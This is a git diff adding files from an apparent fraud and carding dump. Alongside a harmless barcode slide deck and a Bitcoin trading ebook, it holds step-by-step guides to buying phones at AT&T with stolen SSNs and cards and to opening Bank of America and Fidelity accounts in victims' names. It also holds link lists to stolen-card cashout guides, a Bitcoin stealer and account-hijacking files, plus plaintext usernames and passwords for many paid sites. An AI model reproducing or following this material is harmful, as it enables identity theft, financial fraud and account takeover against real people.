on whitepages or truthfinder or +instantcheckmate... Then use the one from the background check I. E whitepages or truthfinder or icm +Go-to AT&T.com with state or city or zip sock +Add one or two iPhones to cart, select payment by installment ( i.e monthly payments just like a +postpaid account) and make sure the total due today charge is not much and drop can afford to pay that +amount before going to pick up cos most likely drop want to pick up at store they will tell him payment +couldn't be processed and so will have to pay in cash to get the phone +Put in ssn information to create the account but only use drop name, every other info e.g phone +number, address, date of birth and ssn should be that of ssn, use any email you haven't used for at&t +before but make sure DOB of SSN are correct that’s what they look at when calculating Credit Score. +Checkout with ZIPCC and use drop name as cc name + +If card is live, you get thank you, track the order, status will be *in progress*..Then Keep an eye in your +INBOX for Ready for pickup Mail, but make sure Client goes to pickup phones with cash Because they’ll +ask to pay for tax Fee. diff --git a/All about pdf417 - 2D Barcodes_pdf.md b/All about pdf417 - 2D Barcodes_pdf.md new file mode 100644 index 0000000..1e10099 --- /dev/null +++ b/All about pdf417 - 2D Barcodes_pdf.md @@ -0,0 +1,272 @@ +# All about pdf417 - 2D Barcodes + + +--- + +FTA TECHNOLOGY +CONFERENCE +2D BARCODES AT A GLANCE +Carlos Gonzalez +CTO Dataintro Software +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +ABOUT 2D BARCODES +• Appeared in 1988 (with Code 49 - Intermec) +• Used in a variety of environments +(surgical, electronic parts, transportation, stamps, taxes) +• PDF 417 (Symbol - 1990) +• More than 20 different 2D symbologies (2005) +In 2003, Missouri started a new era of tax tools +In 2004, AL, AZ, OK, MD, LA +Our Phylosophy: 1 FORM = 1 BARCODE +2D BARCODES = SAFETY NET +1 + +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +1D & 2D BARCODES? +2 +ycnadnudeR Datamatrix PDF +3 of 9 417 +1D Reading +2D Reading +•ECL in form of checksum •ECL in form of codewords +•Reads with Laser •Reads with Imager (CCD) +•Small capacity •Large capacity(*) +•Used as a Key to DB •Portable Database +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +THE WORLD OF 2D BARCODES +STACKED TYPE +Codablock +Code 49 PDF 417 +MATRIX TYPE +Code 1 Datamatrix QR Code +3di OTHAErrRa yT TYaPgE DataGlyph + +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +HOW TO GENERATE 2D BARCODES +Libraries +• Have to be installed with software application +• Software app. has to be developed & maintained +Fonts +• Have to be installed in the user PC (at least once) +• Need a specific encoding algorithm (similar as libraries) +PDF Forms +• Do not install libraries +• Do not install fonts +• Leverage a general purpose platform (PDF) +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +HOW TO READ 2D BARCODES +Software (needs previous scan to Image) +AllMyPapers, IBM IFP, Pegasus, +TeleForm (Verity), Seaport, etc. +Starting at 1,000$ +Hardware (Laser & CCD) +Symbol, Datalogic, Metrologic +CCD, Laser +Starting at 350$ +3 + +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +PAPER FORMS DATA CAPTURE ALTERNATIVES +OCR, OMR, ICR (Pattern based methods) +EXCEPTION HANDLING +MANUAL HAND KEY (single, double, triple) +BOTH HAVE ERRORS (& FALSE POSITIVES) +2D BARCODES are 100% ERROR FREE +•Less expensive to read (.90 vs .30 ) +$ $ +•No error or false positives +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +Starring PDF 417 +PDF= Portable Data File +ISO:IEC 15438 (SYMBOL TECH.) +The basic unit: Mr. Codeword +(a 417 pattern) +23134121 +1 BARCODE = 925 MAX DATA CW +4 + +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +ANATOMY OF A PDF 417 +Start Left Row DATA Right R. Stop +Pattern Indicator CODEWORDS Indicator Pattern +(1-30 columns) +5 +ENOZ +TEIUQ +GNIDAEL +ENOZ +TEIUQ +GNILIART +SYMBOL CAPACITY +1,850 TEXT - 1,108 BYTE - 2,710 NUMBER (ECL-0) +2 CharPerCw 1.2 CharPerCw 2.93 CharPerCw +1,726 TEXT - 1,033 BYTE - 2,528 NUMBER (ECL-5 ) +min rec +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +ROWS AND COLUMNS +ROW +2 COLUMNS OVERHEAD +10 COLUMNS +she sells sea shells by the sea shore she +sells sea shells by the sea shore (76) +Number of COLUMNS is between 1-30 +Number of ROWS is between 3-90 + +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +ECL : Error Correction Level +ECL 4 (118 DATA : 32 ECC) +ECL 6 (118 DATA : 128 ECC) +ECL 8 (118 DATA : 512 ECC) +MANUFACTURER +RECOMMENDATIONS (SYMBOL): +When I find myself in times of +trouble Mother Mary comes to Always try to maintain printing +me speaking words of wisdom, +let it be. And in my hour of quality. +darkness She is standing right +in front of me speaking words +of wisdom, let it be. Let it Do not compensate poor +be, let it be (230) +printing quality with a raise of +ECL +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +RESOLUTION & X:Y RATIO +X +1:1 MODULE +RESOLUTION (X) +2:1 measured in mils +1 mil = 1/10,000 inch +3:1 +4X +3X +2X +4:1 +MANUFACTURER RECOMMENDATIONS (SYMBOL): +At least minimum recommended ECL: 3x +Less than minimum recommended ECL: 4x +6 +Y + +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +2D BARCODE PARAMETERS +QUANTITY OF DATA +COMPRESSED, UNCOMPRESSED +AVAILABLE PHYSICAL SPACE +AS MUCH AS POSSIBLE AT DESIGN TIME, REDESIGN, SEPARATE SHEET +READING METHOD PRINTING ENV. +HARD, SOFT, FAX CONTROLLED vs UNCONTROLLED +NUM. COLUMNS ECL +1-30 1-8 +RESOLUTION X:Y RATIO +10-15 2:1 - 3:1 +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +WHAT’S INSIDE A 2D BARCODE? +ALPHANUMERIC DATA +- Static info (owner): DOR ID, Form Version... +- Variable info (owner): Date, Time... +- Control Characters (TAB, CR, F keys) +- Variable info (user): User Data... +- Any Format (CSV,TAB,XML) +VALUABLE FORM INFO +- NumChars, TimeToFill, ViewerVersion, etc... +7 + +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +MACRO PDF417 +Up to 99,999 symbols can be chained +together and be read as one file +Totalling 100+ MB +• Macro vs Distributed 2D Barcoding +MICRO PDF417 (aka “Truncated”) +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +MULTI PAGE BARCODING OPTIONS +1 BC = 1 Page 1 BC = 1 Form 1 Page for all BCs. +Needs 3 Watch print order (what do I sign?) +captures +DON’T ALLOW THE USER TO +PRINT THE FORM PARTIALLY +8 + +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +2D BARCODES & ENCRYPTION +2D BARCODES ARE FOR DATA CAPTURE +- What if we cannot read? +Controlled vs Uncontrolled (Print env.) +- Sign readable set +DATA + KEY = Encrypted DATA +Technology = Rsytbwpwyz +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +FAXES & 2D BARCODES +• Capture from FAX +• Symbol needs more resolution +9 + +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +FIND THIS PRESENTATION AT: +www.dataintro.com/fta/ +send questions to: +carlosg@dataintro.com +TO KNOW MORE ABOUT 2D BARCODES... +WWW.ADAMS1.COM +WWW.SYMBOL.COM +FTA TECHNOLOGY CONFERENCE +August 7-10 | Columbus, OH +2D Barcodes at a Glance +Carlos Gonzalez (Dataintro Software) +2D BARCODES AT A GLANCE +THANK YOU! +10 diff --git a/BITCOINMEGAPACK FASTERLINK_txt.md b/BITCOINMEGAPACK FASTERLINK_txt.md new file mode 100644 index 0000000..53cd972 --- /dev/null +++ b/BITCOINMEGAPACK FASTERLINK_txt.md @@ -0,0 +1,179 @@ +# BITCOINMEGAPACK FASTERLINK + + +--- + +http://www107.zippyshare.com/v/JdfylNYK/file.html 3 WORKING BITCOIN CASHOUT METHODS +http://www107.zippyshare.com/v/hyOZIsih/file.html CC/CVV BITCOIN CASHOUT METHOD +http://www120.zippyshare.com/v/y0tRfRDq/file.html CREDIT CARD TO BITCOIN +http://www120.zippyshare.com/v/7SWPefDX/file.html CC TO BITCOIN SKRILL +http://www120.zippyshare.com/v/vakljHuf/file.html CREDIT CARD TO BITCOIN VIRWOX +http://www117.zippyshare.com/v/Lxd0u0Ft/file.html STOLEN PAYPAL TO BITCOIN +http://www96.zippyshare.com/v/Wt6nygtz/file.html MR BITCOIN THIEF +http://www17.zippyshare.com/v/m6OUp7BQ/file.html CC/PAYPAL INTO BITCOIN/CASH RUNESCAPE 1 +http://www17.zippyshare.com/v/m6OUp7BQ/file.html CC/PAYPAL TO BITCOIN/CASH RUNESCAPE 2 +http://www51.zippyshare.com/v/ubastxjD/file.html SEVERAL BITCOIN CASHOUT METHODS +http://www8.zippyshare.com/v/F1vc07d7/file.html STOLEN CREDIT CARDS TO BITCOIN +https://mega.nz/#!PFpVXQrC!HeMt9sq6Ns3JCKalq0isgSLw_B5zr9CySOgE0sOrBw4 file password ny38eyjpq BITCOIN STEALER AND MASS ADDRESS GENERATOR +http://www107.zippyshare.com/v/IiujXrbZ/file.html CARDING VOCABULARY +http://www107.zippyshare.com/v/uVRdtjgD/file.html UK CASHOUT +http://www120.zippyshare.com/v/lGCxqd18/file.html CC/CVV/FULLZ SHOPPING GUIDE +http://www120.zippyshare.com/v/1DrZcvFF/file.html CREDIT CARD CASHOUT METHOD 1 +http://www96.zippyshare.com/v/8KM7VNSY/file.html DONT GET CAUGHT CARDING GUIDE +http://www8.zippyshare.com/v/FpyjLSYK/file.html ULTIMATE EBAY/PAYPAL SCAM & CASHOUT GUIDE +http://www8.zippyshare.com/v/1KIytvuK/file.html DUMP CASHOUT + +BITCOIN_DOMINATION.PDF +http://www76.zippyshare.com/v/zl1wBYgh/file.html + +bitcoin_pioneer.pdf +http://www76.zippyshare.com/v/zXhLK0ar/file.html + +Bitcoin_Step_By_Step_2nd_Edition.pdf +http://www76.zippyshare.com/v/NTrEfsvn/file.html + +Bitcoin-základy-a-stavební-kameny.pdf +http://www76.zippyshare.com/v/JfiSVStL/file.html + +Crypto_Cash.pdf +http://www76.zippyshare.com/v/nxvAnZdF/file.html + +How to Earn Bitcoins for Free! Udated 1.pdf +http://www76.zippyshare.com/v/gCVDDDlA/file.html + +How to get 100,000 bits.pdf +http://www76.zippyshare.com/v/ITowUhaa/file.html + +The Bitcoin Bible.pdf +http://www76.zippyshare.com/v/bdhnhTNI/file.html + +The EASIEST Way to Make 200000+ Satoshi Right Now.pdf +http://www76.zippyshare.com/v/71NXH977/file.html + +The-Ultimate-Bitcoin-Money-Making-Guide.pdf +http://www76.zippyshare.com/v/ENUVFBDE/file.html + +virtual bitcoin.pdf +http://www76.zippyshare.com/v/UY1qfbP2/file.html + +Dream Market Invite +http://lchudifyeqm4ldjj.onion/?aZi=176866 +----------------------------------------------------------------------------------------------- +How To Make A Girl Squirt +http://ultrashare.net/hosting/fl/1906014eb7 +----------------------------------------------------------------------------------------------- +TuneUp Utilities 2014 +http://freetexthost.com/5xod3csk25 +----------------------------------------------------------------------------------------------- +CCleaner All edition +http://freetexthost.com/pkusnh335s +----------------------------------------------------------------------------------------------- +Daemon Tools Pro Advanced +http://freetexthost.com/y0yio2xr5n +----------------------------------------------------------------------------------------------- +Sony Vegas Pro 13 (64-BIT) +http://freetexthost.com/gex3jwnxcp +----------------------------------------------------------------------------------------------- +12,000+ Kindle Book Pack +https://mega.co.nz/#!UlYW1I4C!cO6j3x69piPdiZ_3utJHwkr2fy1i73VztNOpLJ03X6w Password: soitgoes +----------------------------------------------------------------------------------------------- +200 Amazing Ebooks +https://mega.co.nz/#!F0wWXLxS!ZuD5R2ZQi5T7wu3QtIOqIEe-jlcNEZcvySzkw8gEz_E Password: soitgoes +----------------------------------------------------------------------------------------------- +SNES Loader with Complete US Romset and Front End Interface +https://mega.co.nz/#!xFkQ3CCY!bPo6qEFVurEntuJUO1FG9kLZzI10yBm_GJT6-Q5z-qg Password: soitgoes +----------------------------------------------------------------------------------------------- +Adobe Photoshop CS6 Extended 13.1.2 Portable (64-bit): +https://mega.co.nz/#!Ud0BiSIa!KlVZtWrlwJkJd5LWHB5DnEd522lnZ5QOS9nHfVugK1M Password: soitgoes +----------------------------------------------------------------------------------------------- +Zip File Password Cracker +https://mega.co.nz/#!2Z0XgaIC!Hr4aLlRqopiNsT_8W-homES4tMr-3w6GsTMlsErPdWA Password: soitgoes +----------------------------------------------------------------------------------------------- +Hijack ALMOST any account with a Phone number +http://freetexthost.com/hqharumvte +----------------------------------------------------------------------------------------------- +25 Classic Books +https://mega.nz/#!VM5xHRbA!W6aBlpRvIfbg68DvgeLuD9lZhzRyIlKERQk6svCn5xg +----------------------------------------------------------------------------------------------- +Make Money on Autopilot +https://mega.nz/#!RYJlWQAJ!vdCJ_KbBKLogZeQ5C5QswgyOYfv1eVF3CTiO3VTCq8c +----------------------------------------------------------------------------------------------- +How To Make Fire works +https://mega.nz/#!QZZ2kKAR!HuPHHXM4g5_fdystknWfiuyBZxu8J20OJbvbO2g9wwU +----------------------------------------------------------------------------------------------- +How To Make Alcohol +https://mega.nz/#!QBxBjCoD!88gTlei9wl8mTDGQDMavssLCEB3VRtJDOjAVHDxgb1Y +----------------------------------------------------------------------------------------------- +Muscle Building Mania +https://mega.nz/#!pcZ01DbB!cfD1bXGPrU9PTiUKISSvwwTCsXfO4DehbmvQzu-SL-o +----------------------------------------------------------------------------------------------- +The Write Way to Succeed +https://mega.nz/#!wZp31JQK!xhNO2qcRtemqRbZwvV65hJmbrZnHJm09nKNY7Tze04M +----------------------------------------------------------------------------------------------- +XXX: +http://members.interracialextreme.com/ +rawpee28 : muOImL3y +rugbyman : barbie +epoch11 : epoch12 + +http://barely18barbie.com/ +S56QaqYNT : ishere2 +iEi9ncMI : iEi9ncMI + +http://members.seemyflixxx.com/index.php – SeeMyFliXXX +buettner1967@freenet.de : sebastian + +http://www.nastyczechchicks.com/members/ +ncc5jtrnd : ncc4hsdkf +ncc1heglr : nccp7iedd + +http://members.allstarporngirls.com/ +auto13 : tabooo +supporttest : callcenter1 + +http://pantyhoseinpublic.com/members/ +cromer12 : b12c12d16j17 +mikeblak : texans29 + +http://members.euroczgirls.com/ +andi1001 : bettina18 +marlys777 : lodies + +http://brokebackasians.com/ +alex300 : rocco7 +Jin1212 : scooby + +http://members.hardpornoflix.com/index.php +25912674 : s2360359 +dabudka : 17891789 +se45085 : 727410 +mthompso : swap42 +colljimmy : adam520 + +http://members.lordsofporn.com/sblogin/login.php/ +offcrkes : shotgun777 +gx92307084 : gx92307084 +903penisbot : 789penisbot +contactcenter : occash55 + +http://www.david-nudes.com/ +aterivbas : muthtartw +2000charge : football999 +lawnmower41 : davidreviewer +blinsiesg : guidepoph + +http://www.pantyhoseplaza.com/members/ +terry1968 : dylan196 + +http://www.pleasebangmywife.com +epcheck : checkep +redrigo : elfriede +thebestporn : review +nctest : password + +http://www.cfnmusa.com/members/index.php +949sanc : silverad +ballinga : dannyb + +10000 cardable sites +http://www37.zippyshare.com/v/HKtYI3Y9/file.html diff --git a/BITCOIN_DOMINATION_pdf.md b/BITCOIN_DOMINATION_pdf.md new file mode 100644 index 0000000..e32ba5c --- /dev/null +++ b/BITCOIN_DOMINATION_pdf.md @@ -0,0 +1,271 @@ +# BITCOIN DOMINATION + + +--- + +Dominate BTC: How to easily +rule the market +|Odin the Wanderer| +Hello, +First I would like to thank you for purchasing my ebook. This will help me +be able to invest more and it will also help pay bills. This is not a magic +ebook like many others. This ebook will give you information on Bitcoin and +how to use/invest in it to give maximum return and more profits. Any +method promises 6 000 000 USD through no work is a lie. I will teach you +the ins and outs of Bitcoin and hopefully you will (and if you follow this you +will) earn more money. When though I make this clear in the guide the rule +of thumb is the following and is imperative to you succeeding. +- Don’t EVER be complusive +- Don’t EVER panic sell +- Don’t EVER believe troll box propaganda +- Don’t EVER waste money on scam coins/other crypto-coins +- Don’t ONLY ever have either fiat or crypto +- Don’t trade on sketchy sites +- PATIENCE +- Calm and collected observation +- Do your own research +- DON’T buy into pumps and dumps +I hope you enjoy this ebook! +------------------------------------------------------------------------------------------------------------ + +What is Bitcoin? +Bitcoin is a peer-to-peer payment system and digital currency that is created +through mining on either a CPU or GPU in which the computer will solve complex +mathematical problems and algorithms in order to mine a ‘block’. Bitcoin uses +software known as ‘wallets’ in which through the decentralized system of Bitcoin +your coins and not counted but tallied, meaning instead of a centralized system +checking you for a valid number of coins it will view all your transactions (as +they’re public) and will use these to determine how many Bitcoins you actually +have. Now you ask why is this information even relevant to speculation? Well, I +will tell you. This is a philosophical statement, it will and cannot be ever used as +valid currency due to it’s inherent problems. Yet we can still view this as an +experiment. The network of Bitcoin is completely decentralized on the basis that +there is no central bank giving out or generating the coins. This is big, very big. +This is something people have had always discussed (as banks are viewed as +corrupt entities, and really, who denies this?) and so people really are interested +in this. No central bank. Anonymous in the fact anyone can make a wallet with +ease and never give any information. Etc. This makes people buy into the Bitcoin +market as they find it’s zeal revolutionary and often it is in alignment with their +political ideology. What does this tell us exactly? It means that for the time being +and while the experiment if you will is continuing, people will continue to buy into +Bitcoin for these reasons ensuring a constant flow. In a way this is like a +guarantee on your investment if you invest at the right time which I will discuss in +another section of this ebook. With the understanding of the philosophical and +political repercussions of Bitcoin you will be better equipped to understand +Bitcoin. +------------------------------------------------------------------------------------------------------------ + +What is speculation? +Speculation is the practice of engaging in risky financial transactions in an +attempt to profit from short or medium term fluctuations in the market value of a +tradable good such as a financial instrument, rather than attempting to profit from +the underlying financial attributes embodied in the instrument such as capital +gains, interest, or dividends. (Source: Wikipedia.org). Now what is the difference +between speculation and investments? It is the margin of risk you are willing to +shoulder. Investments are usually longer term and are considered generally safe +choices. But this is for the more traditional type of investment like stocks. We are +not dealing with a stock, we are dealing with a cryptocurrency which is valued in +USD. If you are already familiar with Bitcoin you will know that the Bitcoin market +is very, very volatile and you can make a lot of money or quickly lose everything +you invested. The type of investments I am going to teach you are ones whom +are very short term and will yield small profits but at the same time will +accumulate into a large profit. But we can look at it another way, if we speculate +Bitcoin we are effectively (as the name implies) inspecting the price of Bitcoin in +the hopes that it will rise and will give a handsome ROI. Knowing how to +speculate the price will greatly help you in investing into Bitcoin. +------------------------------------------------------------------------------------------------------------ +Why bother speculating it? +This is a great question undoubtably asked by some of you, +“why bother speculate Bitcoin, isn’t it no different from any other stock?”. The +Bitcoin market is very volatile, very volatile and it is very rare for anyone to ever +see this much price fluctuation in a ‘stock’ (to make it simple we’ll consider +Bitcoin “stock”). In one day Bitcoin can either surge $100 in ‘stock’ price or it can +lose 50% of it’s value, making this very attractive to those whom like to speculate +prices. You can turn a lot of profit from speculating it and the market almost +always corrects itself if you it does lose value, patience will be your friend. +Because of this it is no wonder why more people are actively speculating Bitcoin +everyday. +------------------------------------------------------------------------------------------------------------ +Where to purchase BTC safely? + +There are several places in which you can purchase BTC safely. One such place +I commonly use is VirWox (https://www.virwox.com/). This is the safest and +fastest way to obtain BTC in my opinion. The way you purchase the BTC is to +sign up --> login --> under ‘My Account:’ find ‘Deposit’ --> Click that --> You now +have several options to deposit money (most people have these basic online +banking businesses such as paypal) --> You then deposit the USD --> Go to +‘Exchange:’ and you will find ‘USD/SLL’ --> Convert all your USD into SLL +(Linden Dollars) --> The find ‘BTC/SLL’ --> Then convert all your SLL into BTC --> +You’re done, you have BTC from using your CC or Paypal from a trusted source. +The first time you withdraw BTC from the site you’ll have to wait 48 hours for +security reasons. This is by far the safest and best method I have came across +unless you wish to use your bank account to transfer funds to an exchange +(Which I advise against). +------------------------------------------------------------------------------------------------------------ +Where to exchange? +My favourite site is BTC-e.com/ru. The rates are the lowest on the market and +the fees are minimal. There is a great and constant flow of exchanges. This site +has always been on time with giving out payments with me and I think you would +like it too. Other exchanges are often corrupt, unsafe, or they don’t allow you to +withdraw your money like MtGox. It is straight forward to make an account and +exchange, don’t look at the chat box othewise known as the ‘troll box’ because +many people there just spread misinformation to make you sell or buy for them to +make profit and make you lose. +------------------------------------------------------------------------------------------------------------ +Where to find BTC price graphs/maps? +I personally use http://bitcoinwisdom.com/markets/btce/btcrur as the place to +view the current price and rates of BTC with РУБ or USD. This provides you with +a very nice overview of the latest exchanges and prices of the market. The +optimal settings I suggest is for each candle to be separated is 15 minutes to see +the price changes. When you get out and buy in as I will detail later in this ebook +I will tell you the best settings to view the trends. + +When to invest? +Please look at the graph below to learn when to invest your money into BTC. +The trick is that the market usually almost always recovers if it crashes, so don’t +be too cocky and don’t buy in at unusually large prices. However in this market +and in stocks in general (as well as life) patients will be your greatest asset. Don’t +compulsively or panic sell, I repeat, NEVER PANIC SELL. Again don’t buy in +when the price is already at high levels that are not with the current trend of + +prices. On BTCwisdom it is encouraged to use the day timer to see the opening +and closing prices of the day. Making 15 minute trades are not profitable and will +not help you. You can also to feel safe look at the current news, for example +China Central Bank debarred people from using virtual currencies such as BTC +which caused a massive shock in the market that dropped prices and made +many people lose money due to less exchange volume from China which fueled +the price to inflate. This is the most crucial step next when to get out, if you need +help to determine when you buy in or invest please consult me and I can help +you with pointers. +------------------------------------------------------------------------------------------------------------ +How to read the graphs? +If you ever get largely into stock trading or speculation you will see a reoccurring +and popular graph system to represent value known as the candle stick graph +system. If you understand it, it will greatly help and you will be undoubtably learn +how to master the market. The funny thing is that many people don’t know how to +read these graphs and don’t look at the hints if provides you. This is a folly that +causes many to lose their money. This is an entire field and I can help you if you +wish to inquiry more about it- but there are many videos which make it was easy +to learn and I will link them here so you don’t have to do any searching. (I +recommend that you take notes from these videos and place them in front of you +as there are certain patterns that will help you see the direction of the market). +Candlesticks Vol 1 - Candlestick Design +http://www.youtube.com/watch?v=k9AlAvYa6MA +Candlesticks Vol 2 - Candlestick Sentiment +http://www.youtube.com/watch?v=v2TkJDseG8I +Candlesticks Vol 3 - Candle Development +http://www.youtube.com/watch?v=enPN5pIeGMo +Candlesticks - Vol 4 - Candle Pattern Stages +http://www.youtube.com/watch?v=r8HRouyRKsg + +Candlesticks - Vol 5 - Shooting Star +http://www.youtube.com/watch?v=mt2_bm2Xy-4 +Candlesticks - Vol 6 - Hanging Man +http://www.youtube.com/watch?v=_wg_NjFj1gk +Candlesticks - Vol 7 - Hammer +http://www.youtube.com/watch?v=wHDgt2HYpnk +Candlesticks - Vol 8 - Inverted Hammer +http://www.youtube.com/watch?v=xTP9gQ_6Sjg +Candlesticks - Vol 9 - Doji +http://www.youtube.com/watch?v=dWkSRpkU_Os +Candlesticks - Vol 10 - Harami +http://www.youtube.com/watch?v=WMwIHgV_FnU +Candlesticks - Vol 11 - Dark Cloud Cover +http://www.youtube.com/watch?v=9fJyoez8j7c +Candlesticks - Vol 12 - Piercing Pattern +http://www.youtube.com/watch?v=oaZ-BUoSu1s +Candlestick Charting - Vol 13 - Bearish Engulfing Pattern +http://www.youtube.com/watch?v=q77CUI8AeHk +Candlestick Charting - Vol 14 - Bullish Engulfing Pattern +http://www.youtube.com/watch?v=17V_5Y2rweA +Candlestick Charting - Vol 15 - Evening Star +http://www.youtube.com/watch?v=bkfg7icb6J4 +Candlestick Charting - Volume 16 - Morning Star +http://www.youtube.com/watch?v=hoieLD74QTQ + +------------------------------------------------------------------------------------------------------------ +How to use the news to predict the future of the coin +Like any stock in any market it Bitcoin is also highly influenced by news. It is also +fairly straight forward and you need not to be an expert on this information. Good +news usually will mean an increase in price (I.e Country embraces Bitcoin), bad +news usually will mean a decrease in price (I.e Country bans Bitcoin). It is good +practice to keep a list of readily available sources for the news. Here are a list of +news outlets I personally use that are dedicated to Bitcoin related topics. +A forum that you can give questions or inquiries about Bitcoin to, and also view +news and happenings. There are many knowledgeable users here. +https://bitcointalk.org/ +A twitter that gives some news about Bitcoin. +https://twitter.com/bitcoinnews +Twitter like site that gives some news about Bitcoin, isn’t always updated +unfortunately. +http://www.breakingnews.com/topic/bitcoin/ +Another twitter that is updated almost everyday with an interesting article or +news. +https://twitter.com/BTCNews247 +Last but not least reddit. Reddit is one of the largest communities online and has +a sub-forum dedicated to Bitcoin. This forum has thousands of users and has a +constant flow of information about Bitcoin added- this is my most used source. It +also provides some interesting links and funny threads. +http://www.reddit.com/r/Bitcoin/ +These will give you when combined 24/7 news coverage of Bitcoin related news +which will be your greatest ally when investing. Remember, when there is bad +news it does not mean to pull out, sometimes a drop in price is a blessing in +disguise. +------------------------------------------------------------------------------------------------------------ + +When to get out? +When do you get out? This is a question that many people actually cannot +answer for you, and I will admit, this will be a task for me. Personally I believe +that you should be in for the long run- panic selling is very destructive not only to +your finances but to the market collectively hurting everyone else which will also +hurt you. I HIGHLY suggest that you have in your exchange account a +combination of fiat and bitcoin to make sure that you can invest more and pull out +whenever needed. Make sure to remain calm in the situation and review +everything. If you need money it is best not to pull out all your Bitcoin into fiat. +Again, if you need help determining when to do this as every situtation is different +contact me. +------------------------------------------------------------------------------------------------------------ +How to exchange BTC with high rates? +Last but not least there is the time when you have withdrawn your invested +Bitcoin. Now you could have had converted it into RUR (or USD for my +Americans) on BTC-e or whatever exchange site you use-- you now have one +last option to maximize your profits and that includes using the very site you most +likely got this ebook from: http://www.hackforums.net with this site there is a +currency exchange that is vibrant and many people use this to exchange. People +are also desperate for Bitcoin more than any other place I have seen in this +section which is found here: http://www.hackforums.net/forumdisplay.php? +fid=182 You will need to make an account if you do not have one and post a +thread in the section. I will provide a template for you so you do not need to go +through the troubles of this process. +Thread title: +H: Currency you want to exchange N: Currency you’re going to exchange for +(use the payment processor to tell, I.e PP = Paypal) +Ie. H: BTC N: PP +Thread body: +Привет, + +У меня есть «Bitcoin». Я хочу обменять «Bitcoin» для рублях. Вы идете в +первую очередь. 10% ставка. +Контакты: +PM +XMPP: +SKYPE +English: +Hello, +I have Bitcoin. I want to exchange Bitcoin for USD. You go first. 10% rate. +Contacts: +PM: +XMPP: +SKYPE: +------------------------------------------------------------------------------------------------------------ +Thank you for taking the time to read my ebook, I put a lot of work into this and I +hope you learned a lot. If you ever have any questions please contact me, I will +be more than happy to help. +And if you were wondering, the secret to this ebook is quite simple and elegant: +Hard work and learning. These are as natural as breathing and I suggest +everyone take from this. +Payment and return proofs: + +BTC-e proof of my earnings: +Left overs from my last +withdraw: diff --git a/BONUS -BankDrops_pdf.md b/BONUS -BankDrops_pdf.md new file mode 100644 index 0000000..5713c3d --- /dev/null +++ b/BONUS -BankDrops_pdf.md @@ -0,0 +1,123 @@ +# BONUS -BankDrops + + +--- + +Bank Drop Creation Tutorial +­By Sacky +BANK DROPS +✪ Bank of America ✪ +OPENING: +Go to http://bankofamerica.com > Banking > Checking > Select your state (use the Fulls state) > +​​ ​ +Under I want the Basics click Learn More > Open Now > Choose Bank of America Core +Checking > Enter all info details (DOB, SSN, Name, Address, etc.) > Choose Unemplyment > +Do not select +Co­applicant > At the question Are you adding money to you account now select No, i'll make +my first deposit after my account is open > Answer the Verify identity questions using the fulls +information > At the question Would you like a new debit card choose No (you can ask to send it +to your drop after) > Accept the next terms > Submit application. + +IMPORTANT: If you have a drop in US and you want to ship the card to your drop, when +entering your address, select living less than 6 months on this address and put the real Full +address after so when you will want to ship the Debit card, you could use it! +Done! You have an Bank of America account. Now enroll to Online Banking. This should be a +no brain work. Choose username, password, security questions, image token, etc. All this +information will be send to your gmail. Now, you are ready to fund and use your BofA account. +Login to the account and go Paperless! So you wont get any documents in the victims mail as +that means a burned Bank Drop. +Connect it to PayPal, Stripe, Square, Flint, etc. but only using the same RDP that you used +when you created it. +DEPOSIT: +1. Buy an American Express Prepaid (if not in US, ask a vendor to do it for you, pay $10 more) +go to AmericanExpress.com and register it. +2. For first deposit you can use localbitcoins.com and sell $20­$30 BTC for cash deposit/bank +transfer +3. Link it to a Paypal (not your own) and deposit from there. (small amounts) +4. For your new debit card, you can find tons of public information on how to create a drop (if +you are US based) and if you are not, partner with someone from deep web to use he/she's +drop and reship it wordwide using a reship service like: http://reship.com +​​ +✪ Fidelity ✪ + +OPENING: +The same basics as with Bank of America, you will have to have the Credit Report and the +Background Check and Motor Record opened so you can answer those id verification +questions. +So, open http://www.fidelity.com click on Open an Account > Investing and Trading / Brokerage +​​ ​ +Account click on Open Online > Individual Account > Are you already a Fidelity customer +answer is No > Enter Name from fulls and email that you created earlier and click on Get +Started > Fill the information needed there (DOB+SSN etc) at trades pet year select 0­35 and +click next > Answer the id verification question. +Here you will have some minutes to fill the info, make sure you are precise and quick about it. It +will be 3 questions and if you answered bad on one you will have another shot on the forth +question that will pop­up. Fidelity tends to ask about your victims car and siblings month of birth. +If you 